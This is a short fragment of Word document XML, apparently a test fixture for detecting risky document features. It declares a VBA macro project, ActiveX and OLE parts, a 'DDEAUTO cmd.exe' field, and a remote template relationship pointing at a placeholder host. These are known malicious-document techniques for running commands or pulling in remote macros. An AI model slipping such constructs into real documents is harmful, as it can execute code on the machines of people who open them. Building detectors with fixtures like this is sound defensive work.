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vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/word/activeX/activeX1.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject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  <w:p>
      <w:r>
        <w:instrText>DDEAUTO cmd.exe</w:instrText>
      </w:r>
    </w:p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rels:Relationship Id="rIdRemoteTemplate" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://example.invalid/template.dotm" TargetMode="External" /><rels:Relationship Id="rIdExternalLink" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/" TargetMode="Externa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